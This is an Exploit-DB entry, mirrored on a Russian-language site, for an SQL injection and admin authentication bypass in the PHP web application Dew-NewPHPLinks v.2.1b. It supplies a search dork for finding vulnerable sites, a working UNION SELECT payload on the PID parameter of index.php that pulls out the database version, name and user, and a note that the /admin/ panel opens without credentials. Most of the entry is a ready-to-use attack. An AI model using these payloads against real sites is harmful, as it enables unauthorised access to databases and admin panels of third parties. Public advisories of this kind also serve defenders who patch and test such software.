- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 16122
- Проверка EDB
-
- Пройдено
- Автор
- ATT4CKXT3RR0R1ST
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2011-02-06
Код:
Dew-NewPHPLinks v.2.1b (index.php) Sql Injection Vulnerability
======================================================================
######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.dew-code.com/
.:. Dork : "Powered By Dew-NewPHPLinks v.2.1b"
.:. Special Gr34T$ T0 ZaIdOoHxHaCkEr
######################################################################
===[ Exploit ]===
First:
=======
www.site.com/index.php?PID=9999[Sql Injection]
www.site.com/index.php?PID=9999+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user()),2
Second:
=======
Bypass join Control Admin
Go to Control Admin [www.site.com/admin/] Dont Ask Username & Password
######################################################################
txt- Источник
- www.exploit-db.com
